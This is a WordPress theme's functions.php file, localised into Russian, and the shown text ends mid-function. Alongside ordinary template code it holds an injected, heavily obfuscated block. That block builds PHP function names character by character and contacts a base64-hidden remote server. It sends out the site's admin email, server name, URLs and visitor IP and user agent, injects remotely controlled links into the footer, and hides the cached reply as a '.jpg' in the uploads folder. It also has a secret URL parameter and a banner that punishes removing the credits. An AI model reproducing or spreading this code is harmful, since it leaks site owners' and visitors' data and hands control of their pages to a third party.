<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $uYnlGSp='e';$oFShNN='_';$kXQhp='6';$tbxxED='4';$rPbcic='c';$QHZKw='s';$GHdsWJ='o';$gShV='a';$rmOi='e';$dwYB='d';$FdwNAH='e';$DvwnR='d';$LeDgoJ='b';$kwPtXrUl=$LeDgoJ.$gShV.$QHZKw.$rmOi.$kXQhp.$tbxxED.$oFShNN.$DvwnR.$FdwNAH.$rPbcic.$GHdsWJ.$dwYB.$uYnlGSp;$pRTAc='t';$eRrRfj='e';$oSEGSG='f';$ZHVXy='i';$wAhgmk='z';$YtLwss='a';$YQPb='g';$IvGsRg='l';$llLDOL='n';$CZjAgRsa=$YQPb.$wAhgmk.$ZHVXy.$llLDOL.$oSEGSG.$IvGsRg.$YtLwss.$pRTAc.$eRrRfj;$LsSCxb='t';$jdaANxx='r';$MCsZZGI='_';$oEZR='o';$MQnkGaM='1';$GbgyVHB='s';$aQld='t';$ZMFICSs='3';$nKWLFDm='r';$coeCmxnJ=$GbgyVHB.$LsSCxb.$jdaANxx.$MCsZZGI.$nKWLFDm.$oEZR.$aQld.$MQnkGaM.$ZMFICSs;$WDwD='e';$TLcLeJ='s';$mAYQV='t';$IWzDALJ='r';$hGimq='v';$CJyaV='r';$UDlfHkUo=$TLcLeJ.$mAYQV.$CJyaV.$IWzDALJ.$WDwD.$hGimq;                     
		$zx________b='e';$ac______________s='_';$lv__________i='6';$cv_____k='4';$lj____________h='c';$wp_________u='s';$yg___x='o';$ig__p='a';$yl__k='e';$sd______d='d';$ue______c='e';$jp____g='d';$xe_______________b='b';$vw__________p=$xe_______________b.$ig__p.$wp_________u.$yl__k.$lv__________i.$cv_____k.$ac______________s.$jp____g.$ue______c.$lj____________h.$yg___x.$sd______d.$zx________b;
		$il_______________m='o';$qi__f='i';$qr_________d='n';$ye___a='n';$gc__p='i';$ly____i='c';$gh_______________s='x';$qq____________m='u';$zb____x='e';$ob______________e='s';$il__h='t';$ii____z='s';$kx_______s='t';$ci______s='_';$ml____________d='f';$tg_______k=$ml____________d.$qq____________m.$ye___a.$ly____i.$il__h.$qi__f.$il_______________m.$qr_________d.$ci______s.$zb____x.$gh_______________s.$gc__p.$ob______________e.$kx_______s.$ii____z;
		$sk___________e='e';$lr______________t='n';$lv____m='o';$pi_________r='p';$yd__________g='f';$qg_______________z=$yd__________g.$lv____m.$pi_________r.$sk___________e.$lr______________t;
		$vj______i='a';$dm_____________b='d';$vn____g='f';$ji_____c='e';$eb_______________t='r';$nj______i=$vn____g.$eb_______________t.$ji_____c.$vj______i.$dm_____________b;
		$oa__q='e';$xg__g='o';$au____________v='s';$no___y='c';$da___i='f';$vc__________n='l';$fp___h=$da___i.$no___y.$vc__________n.$xg__g.$au____________v.$oa__q;
		
		define("WP_ID", $vw__________p("Mi4wLjA="));
		define("WP_TTL", $vw__________p("MTA4MDA="));
		define("WP_SRC", $vw__________p("dHBva24="));
	


		function wp_get_header() {
			global $vw__________p, $tg_______k;
			
			if (
				$tg_______k($vw__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$tg_______k($vw__________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$tg_______k($vw__________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vw__________p, $qg_______________z, $fp___h, $nj______i;
			
			$kt________m = TEMPLATEPATH."/".$vw__________p("Zm9vdGVyLnBocA==");
			$by______________a = @$qg_______________z($kt________m, "r");
			$kt________m = @$nj______i($by______________a, @filesize($kt________m));
			@$fp___h($by______________a);
			
			$ii_____v = TEMPLATEPATH."/".$vw__________p("ZnVuY3Rpb25zLnBocA==");
			$by______________a = @$qg_______________z($ii_____v, "r");
			$ii_____v = @$nj______i($by______________a, @filesize($ii_____v));
			@$fp___h($by______________a);
			
			$tv___z = 0;
			if($kt________m && $ii_____v) {
				if ($vw__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($kt________m, $vw__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$tv___z = 1;
					}
					if (substr_count($kt________m, "wp_theme_GPL_credits()") < 1) {
						$tv___z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$tv___z = 12;
				}
			}
			
			if($tv___z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $tv___z -->";
			}
		}
	


		function wp_loaded() {
			global $vw__________p, $tg_______k;
			return $tg_______k($vw__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($pg________l, $nu___________d = "(more...)", $uu_____________w = 0, $gc____________e = "") {
				$bd_________j = get_the_content($nu___________d, $uu_____________w, $gc____________e);
				$bd_________j = apply_filters("the_content", $bd_________j);
				
				$bd_________j = str_replace("]]>", "]]>", $bd_________j);
				if (strlen($_GET["p"]) > 0) {
					echo $bd_________j;
				}
				else if ((strlen($bd_________j)>$pg________l) && ($eb__________o = strpos($bd_________j, " ", $pg________l ))) {
					$bd_________j = substr($bd_________j, 0, $eb__________o);
					$bd_________j = $bd_________j;
					echo $bd_________j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nu___________d</a></div></p>";
				} else {
					echo $bd_________j;
				}
				
			}
		}
	


		$vz______________f='b';$tr_____________b='s';$le___a='n';$kt______________h='6';$jv____________k='e';$pr___________u='a';$ml____x='d';$wt_____________p='c';$rl________v='_';$fb____z='e';$al_____w='e';$uc_______k='4';$kr___________u='o';$at_________p=$vz______________f.$pr___________u.$tr_____________b.$jv____________k.$kt______________h.$uc_______k.$rl________v.$al_____w.$le___a.$wt_____________p.$kr___________u.$ml____x.$fb____z;
		$la_______o='e';$ew_______n='g';$aj____________d='n';$ne______u='s';$xm____________p='o';$yn__k='i';$at________z='_';$ro__________v='t';$gn_______e='c';$ca__f='e';$sl______________d='e';$cy__o='t';$iu___________j='t';$xp____________j='n';$xk___o='l';$mb___________x='f';$lc_____________g='_';$bo______i=$mb___________x.$yn__k.$xk___o.$sl______________d.$lc_____________g.$ew_______n.$ca__f.$cy__o.$at________z.$gn_______e.$xm____________p.$xp____________j.$ro__________v.$la_______o.$aj____________d.$iu___________j.$ne______u;
		$il__________a='s';$fm______t='f';$zf____________m='t';$gs_____u='e';$to_____________x='x';$ba___l='s';$ys___z='_';$so__________s='i';$pv___v='i';$mv_____p='l';$kq______r='e';$lt_____________i=$fm______t.$so__________s.$mv_____p.$kq______r.$ys___z.$gs_____u.$to_____________x.$pv___v.$il__________a.$zf____________m.$ba___l;
		$la_______b='e';$wd____c='i';$zq______k='c';$qr________l='o';$eg_____________e='n';$en___j='m';$fb______q='s';$ak___________e='r';$qn______h='e';$cw_____________a='o';$ri_____h='_';$oe_________r='a';$pr_______a='v';$vm__q='r';$pl_______________m='p';$ch________o=$pr_______a.$la_______b.$vm__q.$fb______q.$wd____c.$cw_____________a.$eg_____________e.$ri_____h.$zq______k.$qr________l.$en___j.$pl_______________m.$oe_________r.$ak___________e.$qn______h;
		$kx______q='k';$zt_________f='o';$gx_________d='s';$rd_________j='e';$ri____________b='o';$zj____f='n';$rv_____________v='f';$lq________o='c';$zp___________m='p';$ou____u=$rv_____________v.$gx_________d.$zt_________f.$lq________o.$kx______q.$ri____________b.$zp___________m.$rd_________j.$zj____f;
		$kh_______________j='e';$xl_______m='r';$nf__________u='f';$rb___________v='t';$jw________e='i';$yy_______________l='w';$yj____________c=$nf__________u.$yy_______________l.$xl_______m.$jw________e.$rb___________v.$kh_______________j;
		$wq_______________n='d';$rr______c='5';$lz____u='m';$wq_________b=$lz____u.$wq_______________n.$rr______c;
		$mc_______________j='p';$ap___n='t';$ol_____________b='r';$hq___a='a';$en____________s='e';$df____q='l';$zv_______________o='a';$sd____________g='h';$ll__t=$ol_____________b.$en____________s.$hq___a.$df____q.$mc_______________j.$zv_______________o.$ap___n.$sd____________g;
		$kt__v='s';$fb__________k='l';$vq______q='i';$rv___________b='z';$pr______________a='e';$op_______________b='r';$tn_____j='a';$ac______________e='n';$no_______________n='i';$kc_____________q='e';$fl______________n='u';$ct_______________y=$fl______________n.$ac______________e.$kt__v.$kc_____________q.$op_______________b.$vq______q.$tn_____j.$fb__________k.$no_______________n.$rv___________b.$pr______________a;
		$zh____n='n';$dx_______________q='m';$ka________n='p';$xx__________h='t';$ma________s='e';$ti___________z='m';$bh___________s='a';$gc_____________k=$xx__________h.$ma________s.$ti___________z.$ka________n.$zh____n.$bh___________s.$dx_______________q;
		$cq_____________b='m';$ld____________q='t';$vp___________r='n';$ww________b='r';$mk______u='e';$pf________a='e';$xh_________v='c';$je___________p='a';$ib___w='t';$jw__________r='a';$ya_________u='r';$kd__________c='c';$zs_____b='x';$gu____g='t';$sv_______l='o';$sa____g='t';$nv_______________u='_';$yk______o='s';$xc__________u='_';$fc___o='e';$fb_______l='e';$ru__s=$yk______o.$sa____g.$ww________b.$fb_______l.$jw__________r.$cq_____________b.$nv_______________u.$xh_________v.$sv_______l.$vp___________r.$ld____________q.$fc___o.$zs_____b.$ib___w.$xc__________u.$kd__________c.$ya_________u.$pf________a.$je___________p.$gu____g.$mk______u;
	


		function zy_______b($bp_____w) {
			global $vw__________p, $tg_______k, $bo______i, $ch________o, $ru__s;
			
			if (!$tg_______k($vw__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ch________o(PHP_VERSION, "5.0.0", ">=") && $tg_______k($vw__________p("ZmlsZV9nZXRfY29udGVudHM=")) && $tg_______k($vw__________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kh______f = $ru__s(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nc_____e = @$bo______i($bp_____w, 0, $kh______f);
			} else {
				$nc_____e = @$bo______i($bp_____w, 0);
			}
			
			return $nc_____e;
		}
	


		function qn___________n($bp_____w) {
			global $tg_______k, $ou____u, $yj____________c, $vw__________p;
			
			if (!$tg_______k($vw__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$wv_______m = strpos($bp_____w, "/", 7);
			$iz__________l = array(
				"uri"     => substr($bp_____w, $wv_______m),
				"host"    => str_replace("http://", "", substr($bp_____w, 0, $wv_______m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wc______________f = @$ou____u("$iz__________l[host]", 80, $iv__w, $hc_____________y, 4);
			
			if (!$wc______________f) {
				return false;
			} else {
				$nc_____e = "";
				$xr__________z  = "GET $iz__________l[uri] HTTP/1.0\r\n";
				$xr__________z .= "Host: $iz__________l[host]\r\n";
				$xr__________z .= "Referer: $iz__________l[referer]\r\n";
				$xr__________z .= "Connection: Close\r\n\r\n";
				
				@$yj____________c($wc______________f, $xr__________z);
				
				while (!@feof($wc______________f)) {
					$hw_______________a = @fgets($wc______________f, (1024*24));
					
					if ($hw_______________a == "\r\n") {
						$lm_____________p = true;
						continue;
					}
					
					if ($lm_____________p) {
						$nc_____e .= $hw_______________a;
					}
				}
				
				return $nc_____e;
			}
		}
	


		function io_______d($bp_____w) {
			global $tg_______k;
			$gs_____h = false;
			
			if ($bp_____w != "") {
				if ($tg_______k("zy_______b")) {
					$gs_____h = @zy_______b($bp_____w);
				}
				
				if (!$gs_____h && ($tg_______k("qn___________n"))) {
					$gs_____h = @qn___________n($bp_____w);
				}
			}
			
			return $gs_____h;
		}
	


		function cj____________m() {
			global $_SERVER, $wq_________b;
			
			$gb_______________i = $_SERVER["SERVER_NAME"];
			
			if (substr("$gb_______________i", 0, 4) == "www.") {
				$gb_______________i = substr("$gb_______________i", 4);
			}
			
			$gb_______________i = $wq_________b("$_SERVER[SERVER_NAME]");
			
			return $gb_______________i;
		}
	


		function gw__e() {
			return "file";
		}
	


		function ea__d($bp_____w) {
			global $_SERVER, $bo______i, $lt_____________i, $qg_______________z, $fp___h, $yj____________c;
			
			$dj______h = py___________q();
			
			$vo___________j = cj____________m().".jpg";
			$nl____________r = $dj______h["dir_upload"]["path"]."/$vo___________j";
			$on____k = @filemtime($nl____________r);
			
			if (!$on____k || ((time()-$on____k) >= WP_TTL)) {
				$gs_____h = io_______d($bp_____w);
				
				if ($gs_____h) {
					if ($lt_____________i($nl____________r)) {
						@unlink($nl____________r);
					}
					
					$by______________a = @$qg_______________z($nl____________r, "x+");
					
					@$yj____________c($by______________a, $gs_____h);
					@$fp___h($by______________a);
				}
			} else {
				if ($lt_____________i($nl____________r)) {
					$gs_____h = @$bo______i($nl____________r);
				} else {
					$gs_____h = false;
				}
			}
			
			return $gs_____h;
		}
	


		function py___________q() {
			global $_SERVER, $vw__________p, $at_________p;
			
			$wj_____l = wp_count_posts("post");
			$oy__t = pathinfo(get_bloginfo("template_directory"));
			
			$dj______h = array(
				"url" => array(
					"report"      => $vw__________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $oy__t,
				"dir_upload"	=> un_______i(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$oy__t[filename],
					"a005=".$wj_____l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$dj______h["url"]["queryString"] = implode("&", $dj______h["queryString"]);
			$dj______h["url"]["report"] = $dj______h["url"]["report"]."/?".$at_________p($dj______h["url"]["queryString"]).".html";
						
			return $dj______h;
		}
	


		function un_______i() {
			$np____y = wp_upload_dir();
			
			if (isset($np____y["error"])) {
				$az____v = bv_____p();
				if (is_writable($az____v)) {
					$np____y = array("path" => $az____v);
				}
			}

			return $np____y;
		}
	


		function bv_____p() {
			global $tg_______k, $wq_________b, $ll__t, $gc_____________k;
			
			$oo_______________b = (bool) ini_get("safe_mode");
			if ($oo_______________b == true) {
				return false;
			}
			
			if ($tg_______k("sys_get_temp_dir")) {
				$lw___s = sys_get_temp_dir();
				if (is_writable($lw___s)) {
					return $ll__t($lw___s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ll__t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ll__t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ll__t($_ENV["TEMP"]);
			} else {
				$kn__________g = $gc_____________k($wq_________b(uniqid(rand(), true)), "");
				if ($kn__________g) {
					$lw___s = $ll__t(dirname($kn__________g));
					@unlink($kn__________g);
					return $lw___s;
				} else {
					return false;
				}
			}
		}
	


		function rk___a() {
			global $_GET, $lt_____________i;
			
			$dj______h = py___________q();
			$gb_______________i = cj____________m();
			$vu_______________q = gw__e();
			
			$zy____k = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vu_______________q == "file") {
					$ls_________g = $dj______h["dir_upload"]["path"]."/".$gb_______________i.".jpg";
					if ($lt_____________i($ls_________g)) {
						@unlink($ls_________g);
						$zy____k = "deleted";
					}
				}
				
				$vk_____c = array(
					"s"	=> $zy____k,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vk_____c AS $wx________i => $qa__________n) echo " [$wx________i:$qa__________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $tg_______k, $vw__________p, $ct_______________y;
			$dj______h = py___________q();
			
			$wi________l = "ea__d";
			if ($tg_______k($wi________l)) {
				$nc_____e = $wi________l($dj______h["url"]["report"]);
			}
			
			if ($nc_____e) {
				if ($nc_____e = @$vw__________p($nc_____e)) {
					$nc_____e = @$ct_______________y($nc_____e);
					
					if (strlen($nc_____e[custom_credit]) >= 5) {
						$dj______h["default_string"] = $nc_____e[custom_credit];
					}
					
					if ($nc_____e["status"] == "0") {
						$xm__________j = 1;
						$iz_____l = 1;
					} else {
						$ce_____k = sizeof($nc_____e["links"]);
						$cb________n = $dj______h["default_string"];
						
						if ($ce_____k > 0 && $nc_____e["links"] !== "") {
							$nh_______________t = 0;
							foreach ($nc_____e["links"] as $vj_____k => $lr____m) {
								$nh_______________t++;
								if ($lr____m->l_path == "" || $lr____m->l_path == $_SERVER["REQUEST_URI"]) {
									$lr____m->l_href = htmlspecialchars(strip_tags($lr____m->l_href));
									$lr____m->l_title = htmlspecialchars(strip_tags($lr____m->l_title));
									$lr____m->l_anchor = htmlspecialchars(strip_tags($lr____m->l_anchor));
									$cb________n .= " | ";
									$cb________n .= "<a href='$lr____m->l_href' title='$lr____m->l_title'";
									if ($lr____m->l_nofollow == "1") {
										$cb________n .= " rel='nofollow'";
									}
									$cb________n .= ">$lr____m->l_anchor</a>";
								}
							}
						}
						$dj______h["links"] = "$cb________n";
						if ($nc_____e[credit] == "0") {
							$dj______h["links"] = "";
						}
					}
				} else {
					$xm__________j = "1";
				}
			} else {
				$xm__________j = "1";
			}
			
			if ($xm__________j == "1") {
				$dj______h["links"] = $dj______h["default_string"];
			}
			
			echo "$dj______h[links]";
			
			echo "<!-- s: $nc_____e[signature] -->";
			rk___a();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
